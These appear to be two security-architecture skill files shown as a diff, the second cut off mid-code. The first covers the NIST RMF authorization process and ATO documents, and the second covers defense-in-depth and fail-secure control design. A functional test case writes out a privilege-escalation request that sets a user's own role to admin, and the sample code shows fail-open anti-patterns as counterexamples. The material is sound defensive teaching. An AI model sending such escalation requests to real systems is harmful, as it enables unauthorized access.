## When to Use
Load this skill when:
- Deploying systems for government/defense
- Preparing for ATO (Authority to Operate)
- Connecting to classified networks
- Formal security testing and evaluation
**Symptoms you need this**:
- "How do I get ATO for production?"
- Government/defense contracts requiring authorization
- "What is an SSP/SAR/POA&M?"
- Preparing for security assessment
**Don't use for**:
- Commercial compliance (use `ordis/security-architect/compliance-awareness-and-mapping`)
- General security (use `ordis/security-architect/security-controls-design`)
## The Authorization Process
### Core Concept: Risk Management Framework (RMF)
**RMF** (NIST SP 800-37) has 7 steps:
```
1. PREPARE → 2. CATEGORIZE → 3. SELECT → 4. IMPLEMENT → 5. ASSESS → 6. AUTHORIZE → 7. MONITOR
↓ ↓ ↓ ↓ ↓ ↓ ↓
Planning Impact Level Controls Build System Test Get ATO Ongoing Ops
```
### Step 1: PREPARE (Pre-Authorization)
**Activities**:
- Define authorization boundary (what's in scope?)
- Identify Authorizing Official (AO) - person with authority to accept risk
- Assemble authorization team (ISSM, ISSO, assessors)
- Review organizational risk tolerance
**Deliverable**: Authorization strategy and team assigned
### Step 2: CATEGORIZE (Impact Analysis)
**Activities**:
- Security categorization using FIPS 199
- Determine impact level: Low, Moderate, or High
- Based on Confidentiality, Integrity, Availability (CIA)
**Impact Levels**:
```
Low: Limited adverse effect
Moderate: Serious adverse effect
High: Severe or catastrophic adverse effect
```
**Example**:
```
System: Healthcare Records Database
Confidentiality: HIGH (patient privacy breach = severe impact)
Integrity: HIGH (incorrect medical records = life-threatening)
Availability: MODERATE (temporary outage = serious but not life-threatening)
Overall System Impact: HIGH (highest of C/I/A)
```
**Deliverable**: Security categorization document
### Step 3: SELECT (Control Selection)
**Activities**:
- Select control baseline (NIST SP 800-53)
- Low baseline → 125 controls
- Moderate baseline → 325 controls
- High baseline → 421 controls
- Tailor controls (add/remove based on organizational needs)
**Control Families**:
- AC (Access Control)
- AT (Awareness and Training)
- AU (Audit and Accountability)
- CA (Assessment, Authorization, and Monitoring)
- CM (Configuration Management)
- CP (Contingency Planning)
- IA (Identification and Authentication)
- IR (Incident Response)
- MA (Maintenance)
- MP (Media Protection)
- PE (Physical and Environmental Protection)
- PL (Planning)
- PS (Personnel Security)
- RA (Risk Assessment)
- SA (System and Services Acquisition)
- SC (System and Communications Protection)
- SI (System and Information Integrity)
**Deliverable**: Control baseline with tailoring decisions
### Step 4: IMPLEMENT (Build System with Controls)
**Activities**:
- Implement selected security controls
- Document implementation in SSP (System Security Plan)
- Common control inheritance (use organization-wide controls)
**Example Control Implementation**:
```
Control: AC-2 (Account Management)
Implementation:
- All accounts created via ServiceNow ticket
- Manager approval required
- Accounts disabled after 30 days inactivity
- Monthly access reviews by data owners
- Evidence: ServiceNow workflow, access review reports
```
**Deliverable**: Implemented system with documented controls (SSP)
### Step 5: ASSESS (Security Assessment)
**Activities**:
- Independent assessment by certified assessor
- Test controls (interviews, configuration review, penetration testing)
- Document findings in SAR (Security Assessment Report)
- Classify findings by severity (Critical/High/Medium/Low)
**Assessment Methods**:
- **Examine**: Review documentation, configurations, logs
- **Interview**: Question staff about procedures
- **Test**: Execute tests (penetration test, scan, functional test)
**Deliverable**: SAR (Security Assessment Report) with findings
### Step 6: AUTHORIZE (Risk Acceptance)
**Activities**:
- Remediate or accept findings
- Create POA&M (Plan of Action & Milestones) for residual risks
- Authorizing Official reviews SSP + SAR + POA&M
- AO makes risk acceptance decision
- Issue ATO (Authority to Operate) or denial
**ATO Types**:
- **Full ATO**: System fully compliant, authorized for 3 years
- **Interim ATO (IATO)**: Temporary authorization (6-12 months) with conditions
- **Denial**: System does not meet minimum security requirements
**Deliverable**: ATO Letter from Authorizing Official
### Step 7: MONITOR (Continuous Monitoring)
**Activities**:
- Ongoing assessment of controls
- Change impact analysis (new vulnerabilities, configuration changes)
- Update POA&M as risks remediated
- Annual re-assessment or earlier if major changes
- Trigger re-authorization when needed
**Deliverable**: Continuous monitoring reports, updated POA&M
## Key Documents
### 1. SSP (System Security Plan)
**Purpose**: Comprehensive description of the system and its security controls.
**Contents**:
```markdown
# System Security Plan (SSP)
## 1. System Identification
- System name, acronym, unique identifier
- System owner, ISSO, ISSM contact info
- Authorization boundary (what's included/excluded)
## 2. System Categorization
- FIPS 199 categorization (Low/Moderate/High)
- CIA impact levels with justification
- Overall system impact level
## 3. System Description
- System purpose and functionality
- Users and use cases
- Data types processed (PII, classified, etc.)
- System architecture diagram
- Network diagram with trust boundaries
- Technology stack (OS, database, languages)
## 4. Authorization Boundary
- Components within boundary (servers, databases, networks)
- External connections (APIs, data feeds)
- Interconnection agreements for external systems
## 5. Security Control Implementation
For EACH control in baseline:
### AC-2: Account Management
**Control Requirement**: Organization manages information system accounts
**Implementation**:
- ServiceNow ticketing system for account requests
- Manager approval required via workflow
- Automated 30-day inactivity disablement
- Monthly access reviews by data owners
**Responsible Role**: System Administrator
**Assessment Procedure**:
- Interview: Ask sysadmins about account creation process
- Examine: Review ServiceNow tickets, approval records
- Test: Attempt to create account without approval (should fail)
**Evidence Location**:
- ServiceNow workflow documentation: /docs/account-mgmt.pdf
- Sample access review: /evidence/access-review-2025-01.xlsx
(Repeat for all ~125-421 controls depending on baseline)
## 6. Related Documents
- Contingency Plan (CP)
- Incident Response Plan (IRP)
- Configuration Management Plan (CMP)
- Continuous Monitoring Plan
## 7. Approval Signatures
- System Owner: [Signature] [Date]
- ISSO: [Signature] [Date]
- ISSM: [Signature] [Date]
```
**Typical Length**: 200-500 pages for HIGH system
### 2. SAR (Security Assessment Report)
**Purpose**: Independent assessment results documenting control effectiveness.
**Contents**:
```markdown
# Security Assessment Report (SAR)
## Executive Summary
- System assessed: [Name]
- Assessment dates: [Start] to [End]
- Assessor: [Name, Credentials]
- Overall assessment: [Pass with findings / Conditional / Fail]
- Critical findings: [Count]
- High findings: [Count]
- Recommendations: [Summary]
## Assessment Scope
- Controls assessed: [List control families or specific controls]
- Assessment methods: Examine, Interview, Test
- Limitations: [Any scope exclusions or constraints]
## Assessment Results by Control
### AC-2: Account Management
**Assessment Procedures**:
1. Interview: System administrators (2025-03-15)
2. Examine: ServiceNow workflow, access review reports
3. Test: Attempted unauthorized account creation
**Finding AC-2-001: MEDIUM**
**Status**: OPEN
**Description**: Access reviews conducted monthly but no evidence of remediation for identified excessive privileges. 3 accounts with admin access had not logged in for 6 months but remain enabled.
**Risk**: Dormant privileged accounts increase attack surface.
**Recommendation**: Implement automated disablement of inactive admin accounts within 30 days. Conduct immediate review of all privileged accounts.
**AO Response**: Accepted. Remediation planned in POA&M item #5.
**Overall Control Result**: PARTIALLY SATISFIED (findings require remediation)
(Repeat for all assessed controls)
## Findings Summary
| Finding ID | Control | Severity | Status | Remediation Due |
|------------|---------|----------|--------|-----------------|
| AC-2-001 | AC-2 | Medium | Open | 2025-06-01 |
| IA-5-001 | IA-5 | High | Open | 2025-04-15 |
| SC-7-001 | SC-7 | Low | Open | 2025-08-01 |
## Assessor Recommendation
Recommend INTERIM ATO for 6 months conditional on remediation of HIGH findings within 30 days. Re-assessment required before full ATO.
**Assessor Signature**: [Name] [Date]
```
**Typical Length**: 100-300 pages
### 3. POA&M (Plan of Action & Milestones)
**Purpose**: Track remediation of security weaknesses and residual risks.
**Contents**:
```markdown
# Plan of Action & Milestones (POA&M)
## POA&M Item #1
**Finding ID**: IA-5-001 (from SAR)
**Control**: IA-5 (Authenticator Management)
**Weakness**: Password policy allows 8-character passwords; NIST recommends minimum 12 characters.
**Risk Level**: HIGH
**Risk Description**: Weak passwords vulnerable to brute-force attacks. Estimated 15% of user accounts have 8-character passwords.
**Milestones**:
- [ ] Milestone 1: Update password policy to require 12 characters (2025-04-01) - System Admin
- [ ] Milestone 2: Force password reset for all 8-char passwords (2025-04-15) - System Admin
- [ ] Milestone 3: Verify 100% compliance via audit query (2025-04-20) - ISSO
- [ ] Milestone 4: Provide evidence to assessor (2025-04-25) - ISSO
**Resources Required**: 40 hours engineering time, communication campaign for users
**Status**: IN PROGRESS (Milestone 1 complete, Milestone 2 in progress)
**Scheduled Completion**: 2025-04-25
**Actual Completion**: [TBD]
## POA&M Item #2
**Finding ID**: AC-2-001 (from SAR)
**Control**: AC-2 (Account Management)
**Weakness**: Dormant privileged accounts not automatically disabled.
**Risk Level**: MEDIUM
**Milestones**:
- [ ] Implement automated script to disable admin accounts after 30 days inactivity (2025-05-01)
- [ ] Immediate review and disable of current dormant admin accounts (2025-04-10)
- [ ] Monthly verification report to ISSO (ongoing)
**Scheduled Completion**: 2025-05-01
## POA&M Item #3 (Risk Acceptance)
**Finding ID**: SC-8-001
**Control**: SC-8 (Transmission Confidentiality)
**Weakness**: Legacy internal API uses HTTP (not HTTPS) for non-sensitive configuration data.
**Risk Level**: LOW
**Recommendation**: Migrate to HTTPS
**AO Decision**: RISK ACCEPTED
**Justification**:
- API only accessible on isolated management network (not exposed to internet)
- Data transmitted is non-sensitive system configuration (no PII, credentials, or classified data)
- Migration to HTTPS requires vendor upgrade (cost: $50k, timeline: 12 months)
- Risk mitigated by network segmentation
**Acceptance Date**: 2025-03-20
**Acceptance Authority**: Authorizing Official [Name]
**Re-evaluation Date**: 2026-03-20 (annual review)
**POA&M Metrics**:
- Total items: 15
- Critical: 0
- High: 1 (in progress)
- Medium: 8 (6 in progress, 2 accepted risk)
- Low: 6 (4 in progress, 2 accepted risk)
```
**Updates**: Monthly or when milestone completed
### 4. ATO Letter (Authority to Operate)
**Purpose**: Formal authorization from Authorizing Official.
**Contents**:
```markdown
MEMORANDUM FOR: System Owner, [Name]
SUBJECT: Authority to Operate (ATO) for [System Name]
1. AUTHORIZATION DECISION
After careful review of the System Security Plan (SSP), Security Assessment Report (SAR), and Plan of Action & Milestones (POA&M), I hereby grant an INTERIM AUTHORITY TO OPERATE for [System Name] for a period of SIX (6) MONTHS, effective [Start Date] to [End Date].
2. AUTHORIZATION BOUNDARY
This authorization covers the system as described in SSP version 2.1, including:
- Application servers (5x EC2 instances)
- PostgreSQL database cluster (2 nodes)
- AWS resources within VPC vpc-abc123
- Users: 500 internal staff with SECRET clearance
3. CONDITIONS OF AUTHORIZATION
This interim ATO is granted subject to the following conditions:
a) HIGH-severity finding IA-5-001 (password policy weakness) must be remediated within 30 days (by 2025-04-25). Failure to remediate will result in suspension of ATO.
b) All MEDIUM-severity findings must be remediated or risk-accepted within 90 days (by 2025-07-01).
c) Monthly POA&M status reports submitted to ISSM.
d) No major changes to system without prior authorization (change impact analysis required).
e) Full security re-assessment required at end of 6-month period for consideration of full 3-year ATO.
4. RESIDUAL RISKS ACCEPTED
I accept the following residual risks as documented in POA&M:
- SC-8-001 (LOW): HTTP on internal API (mitigated by network segmentation)
5. CONTINUOUS MONITORING
System owner must maintain continuous monitoring program including:
- Weekly vulnerability scans
- Monthly access reviews
- Quarterly control spot-checks
- Annual contingency plan testing
6. AUTHORIZATION TERMINATION
This authorization may be suspended or revoked if:
- Conditions of authorization not met
- New vulnerabilities with HIGH or CRITICAL severity discovered
- Significant security incident occurs
- Major system changes without authorization
Authorizing Official: [Signature]
[Name], [Title]
[Date]
```
## Authorization Types
### ATO (Authority to Operate)
**Full ATO**:
- Duration: 3 years (typically)
- Conditions: All HIGH/CRITICAL findings remediated or risk-accepted
- Re-authorization: Every 3 years or upon major change
**Interim ATO (IATO)**:
- Duration: 6-12 months
- Conditions: HIGH findings have remediation plan, progress tracked
- Purpose: Allow operation while remediating non-critical issues
- Requires full assessment at expiration
**Denial**:
- System does not meet minimum security requirements
- CRITICAL/HIGH findings with unacceptable risk
- Must remediate before re-submission
### AIS (Authorization to Interconnect)
**Purpose**: Authorization to connect two systems across trust boundaries.
**When needed**:
- Connecting to external networks
- Connecting systems at different classification levels
- Sharing data between organizations
**Requirements**:
- Both systems have current ATO
- Interconnection Security Agreement (ISA)
- Boundary protection documented
- Data flow diagrams
- Security controls at boundary (firewall, data diode, etc.)
**ISA Contents**:
```markdown
# Interconnection Security Agreement (ISA)
## Systems
- System A: [Name], ATO valid until [Date]
- System B: [Name], ATO valid until [Date]
## Data Flows
- Direction: System A → System B
- Data type: Transaction records (OFFICIAL classification)
- Frequency: Real-time API calls
- Volume: 10,000 records/day
## Boundary Protection
- Firewall: Palo Alto PA-5000 at boundary
- Allowed traffic: HTTPS port 443 only, source IP whitelisted
- Data validation: System B validates all incoming data
- Encryption: TLS 1.3 with mutual authentication
## Security Controls
- AC-4: Information flow enforcement (firewall rules)
- SC-7: Boundary protection (dedicated firewall)
- SC-8: Transmission confidentiality (TLS 1.3)
## Roles and Responsibilities
- System A ISSO: Monitor outbound connections, alert on anomalies
- System B ISSO: Validate incoming data, monitor for security events
- Network team: Maintain firewall, apply security patches
## Incident Response
- Security incident on either system triggers review of interconnection
- Contact: [System A ISSO], [System B ISSO]
## Review and Re-authorization
- Annual review of ISA
- Re-authorization required if either system ATO expires or major changes
**Approvals**:
- System A AO: [Signature] [Date]
- System B AO: [Signature] [Date]
```
### T&E (Test & Evaluation)
**Purpose**: Independent security testing before authorization.
**Testing Types**:
#### 1. Vulnerability Assessment
```bash
# Authenticated vulnerability scan
nessus scan --authenticated --target 10.0.1.0/24 \
--policy "Government High Baseline" \
--output vuln-report.pdf
# Results:
# Critical: 0
# High: 2 (outdated SSL certificates, missing patches)
# Medium: 15
# Low: 43
```
#### 2. Penetration Testing
```markdown
# Penetration Test Report
## Scope
- External penetration test (internet-facing)
- Internal penetration test (insider threat simulation)
- Duration: 2 weeks
## Rules of Engagement
- No DoS attacks
- No social engineering of executives
- Data exfiltration limited to test accounts
## Findings
### FINDING PT-001: HIGH
**Vulnerability**: SQL injection in /api/users endpoint
**Exploit**: Extracted 10 test user records via injection
**Impact**: Attacker could exfiltrate entire user database
**Recommendation**: Implement parameterized queries, input validation
**Remediation**: Developer committed fix (commit abc123), deployed 2025-03-20
**Verification**: Re-tested 2025-03-22, vulnerability no longer exploitable
## Summary
- High findings: 1 (remediated)
- Medium findings: 3 (2 remediated, 1 in POA&M)
- Low findings: 8 (accepted risk)
```
#### 3. Functional Security Testing
```markdown
# Functional Security Test: Access Control
## Test Case TC-AC-001: Unauthorized Access Attempt
**Objective**: Verify user cannot access resources without authorization
**Procedure**:
1. Login as user@example.com (no admin privileges)
2. Attempt to access /admin/users endpoint
3. Expected result: 403 Forbidden
**Actual Result**: 403 Forbidden ✅
**Status**: PASS
## Test Case TC-AC-002: Privilege Escalation
**Objective**: Verify user cannot elevate own privileges
**Procedure**:
1. Login as user@example.com
2. Attempt to modify own role via API: PUT /api/users/me {"role": "admin"}
3. Expected result: 403 Forbidden
**Actual Result**: 200 OK, role changed to admin ❌
**Status**: FAIL - CRITICAL
**Remediation Required**: Implement server-side role validation, users cannot modify own roles
```
**T&E Report**: Submitted to assessor as input to SAR.
## Continuous Monitoring
**Purpose**: Ongoing assurance that controls remain effective.
### Monitoring Activities
#### 1. Automated Scanning
```bash
# Crontab entries (root)
# Weekly vulnerability scan (Mondays, 02:00)
0 2 * * 1 /opt/nessus/scan.sh
# Monthly configuration compliance check (1st of each month, 03:00)
0 3 1 * * /opt/scap/compliance-check.sh
```
#### 2. Access Reviews
```markdown
# Monthly Access Review
## Review Date: 2025-04-01
## Reviewer: Data Owner (Jane Smith)
| User | Role | Last Login | Action |
|------|------|------------|--------|
| john.doe@example.com | Admin | 2025-03-28 | ✅ Retain |
| alice.smith@example.com | User | 2025-03-25 | ✅ Retain |
| bob.jones@example.com | Admin | 2024-12-15 | ❌ Remove (dormant 4 months) |
**Actions Taken**:
- Disabled bob.jones@example.com on 2025-04-02
- Notified ISSO of access review completion
```
#### 3. Change Impact Analysis
```markdown
# Change Impact Analysis: Database Upgrade
## Change Description
Upgrade PostgreSQL from 13.2 to 13.10 (security patches)
## Security Impact Assessment
- Controls affected: SC-28 (Protection of information at rest - encryption still enabled)
- New vulnerabilities: CVE-2024-XXXX patched in 13.10
- Configuration changes: None (encryption settings preserved)
## Authorization Impact
- Change Type: Minor (security patch)
- ATO Impact: None (no re-authorization required per continuous monitoring plan)
- ISSO Notification: Required (notified 2025-03-15)
## Testing
- Tested in dev environment: 2025-03-10 (PASS)
- Contingency plan: Snapshot before upgrade, 4-hour rollback window
## Approval
- ISSO: Approved (2025-03-16)
- System Owner: Approved (2025-03-17)
- Deployed: 2025-03-20
```
#### 4. Trigger Events for Re-Authorization
**Major change** (requires re-authorization before implementation):
- New system interconnection
- Change in classification level
- Major architectural change (e.g., move to cloud)
- Change in data types processed (e.g., add PII)
**Minor change** (notify ISSO, may not require re-authorization):
- Security patches
- Configuration hardening
- Adding users
## Quick Reference: Authorization Timeline
```
Month 1-2: PREPARE + CATEGORIZE + SELECT
- Define boundary, assemble team
- Determine impact level (Low/Moderate/High)
- Select control baseline (125-421 controls)
Month 3-6: IMPLEMENT
- Build system with security controls
- Write SSP (200-500 pages)
- Prepare evidence
Month 7-8: ASSESS
- Independent security assessment
- Penetration testing
- SAR with findings
Month 9: AUTHORIZE
- Remediate HIGH/CRITICAL findings
- Create POA&M for residual risks
- AO reviews package
- ATO issued (or IATO or Denial)
Ongoing: MONITOR
- Weekly scans
- Monthly access reviews
- Quarterly spot-checks
- Annual re-assessment or every 3 years
```
**Typical timeline**: 9-12 months for HIGH system, 6-9 months for MODERATE, 3-6 months for LOW.
## Common Mistakes
### ❌ Treating ATO as Checklist
**Wrong**: "We have all controls implemented, give us ATO"
**Right**: ATO is risk acceptance decision. Document residual risks, let AO decide.
**Why**: AO accepts risk on behalf of organization. Your job is to inform that decision, not make it.
### ❌ Starting SSP After Implementation
**Wrong**: Build system, then write SSP to document what exists
**Right**: Write SSP during design/implementation, update as you build
**Why**: SSP informs design decisions. Writing after implementation often reveals missing controls.
### ❌ Ignoring Continuous Monitoring
**Wrong**: Get ATO, assume you're done for 3 years
**Right**: Continuous monitoring is mandatory. Weekly scans, monthly reviews, change impact analysis.
**Why**: ATO can be revoked if controls degrade. Continuous monitoring proves ongoing compliance.
### ❌ No Risk Acceptance for Residual Risks
**Wrong**: Hide findings or claim "we'll fix later"
**Right**: Document in POA&M, explicit risk acceptance by AO for LOW/MEDIUM items
**Why**: Transparency builds trust. AO needs full picture to make informed decision.
### ❌ Vague Control Implementation Descriptions
**Wrong**: "AC-2: We manage accounts properly"
**Right**: "AC-2: ServiceNow ticket → manager approval → automated creation → 30-day inactivity disablement → monthly review. Evidence: /docs/account-mgmt.pdf"
**Why**: Assessor cannot verify vague descriptions. Specific implementation enables assessment.
## Cross-References
**Use WITH this skill**:
- `ordis/security-architect/security-controls-design` - Implement controls for SSP
- `ordis/security-architect/threat-modeling` - Inform security categorization
- `muna/technical-writer/operational-acceptance-documentation` - Write SSP/SAR/POA&M
**Use AFTER this skill**:
- `ordis/security-architect/classified-systems-security` - If system handles classified data
## Real-World Impact
**Systems using formal authorization processes**:
- **DoD Cloud Migration**: RMF process revealed 47 missing controls before migration. Remediated during IMPLEMENT phase (vs discovering at ASSESS). Achieved ATO in 9 months vs industry avg 14 months.
- **Healthcare System (Moderate)**: POA&M transparency with 12 accepted LOW risks enabled IATO while remediating MEDIUM findings. System operational 6 months earlier than "wait for perfect" approach.
- **Continuous Monitoring**: Weekly scans detected CVE-2024-XXXX within 48 hours of disclosure. Change impact analysis approved emergency patch in 24 hours (vs 3-week change control for non-monitored systems).
**Key lesson**: **Formal authorization process enables informed risk decisions by leadership. SSP+SAR+POA&M transparency beats "security by checklist" or "security by obscurity".**

View File

@@ -0,0 +1,537 @@
# Security Controls Design
## Overview
Design security controls as **layered defenses at trust boundaries**. Core principle: Apply systematic checks at every boundary to ensure no single control failure compromises security.
**Key insight**: Identify WHERE controls apply (trust boundaries) before choosing WHICH controls to implement.
## When to Use
Load this skill when:
- Implementing authentication/authorization systems
- Hardening API endpoints, databases, file storage
- Designing data protection mechanisms
- Securing communication channels
- Protecting sensitive operations
**Symptoms you need this**:
- "How do I secure this API/database/upload feature?"
- "What controls should I implement?"
- "How do I prevent unauthorized access to X?"
- "How do I harden this system?"
**Don't use for**:
- Threat modeling (use `ordis/security-architect/threat-modeling` first)
- Code-level security patterns (use `ordis/security-architect/secure-code-patterns`)
- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`)
## Core Methodology: Trust Boundaries First
**DON'T start with**: "What controls should I implement?"
**DO start with**: "Where are the trust boundaries?"
### Step 1: Identify Trust Boundaries
Trust boundaries are **points where data/requests cross from less-trusted to more-trusted zones**.
**Common boundaries:**
- Internet → API Gateway
- API Gateway → Application Server
- Application → Database
- Application → File Storage
- Unauthenticated → Authenticated
- User Role → Admin Role
- External Service → Internal Service
**Example: File Upload System**
```
Trust Boundaries:
1. User Browser → Upload Endpoint (UNTRUSTED → APP)
2. Upload Endpoint → Virus Scanner (APP → SCANNER)
3. Scanner → Storage (SCANNER → S3)
4. Storage → Display (S3 → USER)
5. Storage → Internal Processing (S3 → APP)
```
### Step 2: Apply Defense-in-Depth at Each Boundary
For EACH boundary, apply multiple control layers. If one fails, others provide backup.
## Defense-in-Depth Checklist
Use this checklist at **every trust boundary**:
### Layer 1: Validation (First Line)
- [ ] **Input validation**: Type, format, size, allowed values
- [ ] **Sanitization**: Remove dangerous characters, escape output
- [ ] **Canonicalization**: Resolve to standard form (prevent bypass)
### Layer 2: Authentication (Who Are You?)
- [ ] **Identity verification**: Credentials, tokens, certificates
- [ ] **Multi-factor authentication**: For sensitive boundaries
- [ ] **Session management**: Secure tokens, expiration, rotation
### Layer 3: Authorization (What Can You Do?)
- [ ] **Access control checks**: RBAC, ABAC, resource-level
- [ ] **Least privilege enforcement**: Grant minimum necessary
- [ ] **Privilege escalation prevention**: No path to higher access
### Layer 4: Rate Limiting (Abuse Prevention)
- [ ] **Request rate limits**: Per-IP, per-user, per-endpoint
- [ ] **Resource quotas**: Prevent resource exhaustion
- [ ] **Anomaly detection**: Flag unusual patterns
### Layer 5: Audit Logging (Detective)
- [ ] **Security event logging**: Who, what, when, where, outcome
- [ ] **Tamper-proof logs**: Write-only for applications
- [ ] **Alerting**: Automated detection of suspicious activity
### Layer 6: Encryption (Confidentiality)
- [ ] **Data in transit**: TLS 1.3, certificate validation
- [ ] **Data at rest**: Encryption for sensitive data
- [ ] **Key management**: Secure storage, rotation, separation
**Example Application** (API Authentication Boundary):
```
Internet → API Gateway boundary:
Layer 1 (Validation):
- Validate Authorization header present and well-formed
- Check request size limits (prevent DoS)
- Validate content-type and payload structure
Layer 2 (Authentication):
- Verify JWT signature (RS256, public key validation)
- Check token expiration (exp claim)
- Verify token not revoked (check Redis revocation list)
Layer 3 (Authorization):
- Extract scopes from token
- Verify endpoint requires scope present in token
- Check resource-level permissions (can user access THIS resource?)
Layer 4 (Rate Limiting):
- Per-token: 1000 requests/minute
- Per-IP: 100 requests/minute (catch token sharing)
- Per-endpoint: Stricter limits on write operations
Layer 5 (Audit Logging):
- Log authentication attempts (success/failure)
- Log authorization decisions (allowed/denied)
- Log resource access (who accessed what)
Layer 6 (Encryption):
- Enforce TLS 1.3 only (reject unencrypted)
- Validate certificate chain
- Store tokens encrypted in session store
```
**If ANY layer fails, others provide defense.**
## Fail-Secure Patterns
When a control fails, system should **default to secure state** (deny access, close connection, reject request).
### Fail-Closed (Secure) vs Fail-Open (Insecure)
| Situation | Fail-Open (❌ BAD) | Fail-Closed (✅ GOOD) |
|-----------|-------------------|---------------------|
| **Auth service down** | Allow all requests through | Deny all requests until service recovers |
| **Token validation fails** | Treat as valid | Reject request |
| **Database unreachable** | Skip permission check | Deny access |
| **Rate limit store unavailable** | No rate limiting | Apply strictest default limit |
| **Audit log fails to write** | Continue operation | Reject operation |
### Examples of Fail-Secure Implementation
**Example 1: Authentication Service Failure**
```python
def authenticate_request(request):
try:
token = extract_token(request)
user = auth_service.validate_token(token) # External service call
return user
except AuthServiceUnavailable:
# ❌ FAIL-OPEN: return AnonymousUser() # Let them through
# ✅ FAIL-CLOSED: raise Unauthorized("Authentication service unavailable")
raise Unauthorized("Authentication service unavailable")
except InvalidToken:
raise Unauthorized("Invalid token")
```
**Example 2: Rate Limiter Failure**
```python
def check_rate_limit(user_id):
    try:
        # incr() returns the new count, so no separate get() is needed
        count = redis.incr(f"rate:{user_id}")
        if count == 1:
            redis.expire(f"rate:{user_id}", 60)  # start a fresh 60-second window
        if count > LIMIT:
            raise RateLimitExceeded()
    except RedisConnectionError:
        # ❌ FAIL-OPEN: return  # Let request through
        # ✅ FAIL-CLOSED: Apply strictest default limit
        # If Redis is down, apply aggressive in-memory rate limit
        in_memory_limiter.check(user_id, limit=10)  # Much stricter than normal
```
**Example 3: Database Permission Check**
```python
def can_user_access_resource(user_id, resource_id):
try:
permission = db.query(
"SELECT can_read FROM permissions WHERE user_id = ? AND resource_id = ?",
user_id, resource_id
)
return permission.can_read
except DatabaseConnectionError:
# ❌ FAIL-OPEN: return True # Assume they have access
# ✅ FAIL-CLOSED: return False # Deny access if can't verify
logger.error(f"DB unavailable, denying access for user={user_id} resource={resource_id}")
return False
```
**Example 4: File Type Validation**
```python
def validate_file_upload(file):
    # Layer 1: Check extension
    if file.extension not in ALLOWED_EXTENSIONS:
        raise ValidationError("Invalid file type")
    # Layer 2: Check magic bytes
    try:
        magic_bytes = file.read(16)
        if not is_valid_magic_bytes(magic_bytes):
            # ✅ FAIL-CLOSED: If magic bytes don't match, reject
            # Even if extension passed, magic bytes take precedence
            raise ValidationError("File content doesn't match extension")
    except ValidationError:
        raise  # Propagate the specific rejection unchanged
    except Exception as e:
        # ❌ FAIL-OPEN: return True  # Couldn't check, assume valid
        # ✅ FAIL-CLOSED: raise ValidationError("Could not validate file")
        raise ValidationError(f"Could not validate file: {e}")
```
**Principle**: **When in doubt, deny**. It's better to have a false positive (deny legitimate request) than false negative (allow malicious request).
## Least Privilege Principle
Grant **minimum necessary access** for each component to perform its function. No more.
### Application Method
**For each component, ask three questions:**
1. **What does it NEED to do?** (functional requirements)
2. **What's the MINIMUM access to achieve that?** (reduce scope)
3. **What can it NEVER do?** (explicit denials)
### Example: Database Access Roles
**Web Application Role:**
```sql
-- What it NEEDS: Read customers, write audit logs
GRANT SELECT ON customers TO web_app_user;
GRANT INSERT ON audit_logs TO web_app_user;
-- What's MINIMUM: No DELETE, no UPDATE on audit logs (immutable), no admin tables
REVOKE DELETE ON customers FROM web_app_user;
REVOKE ALL ON admin_users FROM web_app_user;
-- Explicit NEVER: Cannot modify audit logs (tamper-proof)
REVOKE UPDATE, DELETE ON audit_logs FROM web_app_user;
-- Row-level security: Only active customers
CREATE POLICY web_app_access ON customers
FOR SELECT TO web_app_user
USING (status = 'active');
```
**Analytics Role:**
```sql
-- What it NEEDS: Read non-PII customer data for analytics
-- What's MINIMUM: View with PII columns excluded
CREATE VIEW customers_analytics AS
SELECT customer_id, country, subscription_tier, created_at
FROM customers; -- Excludes: name, email, address
GRANT SELECT ON customers_analytics TO analytics_user;
-- What it can NEVER do: Access PII, modify data, see payment info
REVOKE ALL ON customers FROM analytics_user;
REVOKE ALL ON payment_info FROM analytics_user;
ALTER ROLE analytics_user SET default_transaction_read_only = on;
```
### File System Permissions
**Application Server:**
```bash
# What it NEEDS: Read config, write logs, read/write uploads
/etc/app/config/ → Read-only for app (owner: root, group: app, dir mode 750, file mode 640)
/var/log/app/ → Append-only writes (owner: app, dir mode 700, log files chattr +a)
/var/uploads/ → Read/write (owner: app, chmod 700)
# What it can NEVER do: Write to config, execute from uploads
/etc/app/config/ → No write permissions
/var/uploads/ → Mount with noexec flag (prevent execution)
```
### API Scopes (OAuth2 Pattern)
```python
# User requests minimal scopes
scopes_requested = ["read:profile", "read:posts"]
# DON'T grant admin scopes by default
# DO grant only what was requested and approved
token = create_token(user, scopes=scopes_requested)
# At each endpoint, verify scope
@require_scope("write:posts")
def create_post(request):
# This endpoint is inaccessible with read:posts scope
pass
```
**Principle**: **Default deny, explicit allow**. Start with no access, grant only what's needed.
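A minimal sketch of how a `require_scope` decorator like the one above might enforce default deny. This is framework-agnostic; `request.token_scopes` and the `Forbidden` exception are illustrative assumptions, not a specific library's API:
```python
from functools import wraps

class Forbidden(Exception):
    """Raised when the token lacks the required scope (maps to HTTP 403)."""

def require_scope(required_scope):
    """Default deny: the wrapped handler runs only if the scope is explicitly present."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(request, *args, **kwargs):
            # Missing or malformed scope list -> empty set -> denied (fail-secure)
            granted = set(getattr(request, "token_scopes", []) or [])
            if required_scope not in granted:
                raise Forbidden(f"Missing required scope: {required_scope}")
            return handler(request, *args, **kwargs)
        return wrapper
    return decorator
```
Note the fail-secure default: an absent scope list results in denial, never a pass-through.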
## Separation of Duties
**No single component/person/account should have complete control** over a critical operation.
### Patterns
#### Pattern 1: Multi-Signature Approvals
**Example: Production Deployments**
```yaml
# Require 2 approvals from different teams
approvals:
required: 2
teams:
- engineering-leads
- security-team
# Cannot approve own PR
prevent_self_approval: true
```
#### Pattern 2: Split Responsibilities
**Example: Payment Processing**
```python
# Component A: Initiates payment (can create, cannot approve)
payment_service.initiate_payment(amount, account)
# Component B: Approves payment (can approve, cannot create)
# Different credentials, different service
approval_service.approve_payment(payment_id)
# Component C: Executes payment (can execute, cannot create/approve)
# Only accepts approved payments
execution_service.execute_payment(approved_payment_id)
```
**No single service can create AND approve AND execute a payment.**
#### Pattern 3: Key Splitting
**Example: Encryption Key Management**
```python
# Master key split into 3 shares using Shamir Secret Sharing
# Require 2 of 3 shares to reconstruct
shares = split_key(master_key, threshold=2, num_shares=3)
# Distribute to different teams/locations
security_team.store(shares[0])
ops_team.store(shares[1])
compliance_team.store(shares[2])
# Reconstruction requires 2 teams to cooperate
reconstructed = reconstruct_key([shares[0], shares[1]])
```
#### Pattern 4: Admin Operations Require Approval
**Example: Database Admin Actions**
```python
# Admin initiates action (creates request, cannot execute)
admin_request = AdminRequest(
